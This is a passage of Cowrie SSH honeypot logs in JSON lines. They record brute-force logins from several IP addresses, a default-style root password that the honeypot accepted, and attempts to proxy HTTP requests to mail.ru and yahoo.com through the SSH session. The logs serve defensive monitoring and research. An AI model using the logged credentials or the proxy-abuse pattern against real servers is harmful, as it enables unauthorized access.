-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.176046Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.277653Z","src_ip":"34.14.223.46","session":"130d7f797131"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.423672Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11893,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11893","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.474174Z","session":"33d1edee3fb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.523923Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":29343,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:29343","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.663979Z","session":"33d1edee3fb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.713753Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":23136,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23136","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.856252Z","session":"33d1edee3fb3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.905872Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:14.956403Z","src_ip":"77.83.207.83","session":"33d1edee3fb3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8175,"dst_ip":"1.2.3.4","dst_port":22,"session":"69a0657588bb","protocol":"ssh","message":"New connection: 77.83.207.83:8175 (1.2.3.4:22) [session: 69a0657588bb]","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.005600Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.015689Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.056126Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.306636Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":21845,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:21845","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.357904Z","session":"69a0657588bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.408621Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27415,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27415","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.552643Z","session":"69a0657588bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.602972Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":29633,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29633","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.744666Z","session":"69a0657588bb"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.794904Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.845872Z","src_ip":"77.83.207.83","session":"69a0657588bb"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8261,"dst_ip":"1.2.3.4","dst_port":22,"session":"69239656fd04","protocol":"ssh","message":"New connection: 77.83.207.83:8261 (1.2.3.4:22) [session: 69239656fd04]","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.894767Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.895638Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:15.945434Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx","message":"login attempt [nginx/nginx] failed","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.033518Z","src_ip":"34.14.223.46","session":"130d7f797131"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.193507Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22918,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:22918","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.244953Z","session":"69239656fd04"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.294868Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":21556,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:21556","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.436368Z","session":"69239656fd04"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.486638Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":21910,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:21910","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.628211Z","session":"69239656fd04"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.678225Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.728844Z","src_ip":"77.83.207.83","session":"69239656fd04"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8359,"dst_ip":"1.2.3.4","dst_port":22,"session":"ab012e6c9a09","protocol":"ssh","message":"New connection: 77.83.207.83:8359 (1.2.3.4:22) [session: ab012e6c9a09]","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.777846Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.787943Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:49:16.827851Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.075953Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":22032,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:22032","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.126546Z","session":"ab012e6c9a09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.176306Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43192,"dst_ip":"1.2.3.4","dst_port":22,"session":"e0e035e0619b","protocol":"ssh","message":"New connection: 212.227.235.229:43192 (1.2.3.4:22) [session: e0e035e0619b]","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.205018Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.205617Z","src_ip":"212.227.235.229","session":"e0e035e0619b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":27370,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:27370","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.316100Z","session":"ab012e6c9a09"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.366039Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38248,"dst_ip":"1.2.3.4","dst_port":22,"session":"87702f8d34a0","protocol":"ssh","message":"New connection: 212.227.125.160:38248 (1.2.3.4:22) [session: 87702f8d34a0]","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.425039Z"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":7203,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:7203","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.508080Z","session":"ab012e6c9a09"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.516287Z","src_ip":"212.227.235.229","session":"e0e035e0619b"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.518815Z","src_ip":"34.14.223.46","session":"130d7f797131"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.557870Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.609149Z","src_ip":"77.83.207.83","session":"ab012e6c9a09"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":8447,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d2c377abfab","protocol":"ssh","message":"New connection: 77.83.207.83:8447 (1.2.3.4:22) [session: 9d2c377abfab]","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.658217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:49:17.668647Z","src_ip":"77.83.207.83","session":"9d2c377abfab"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-s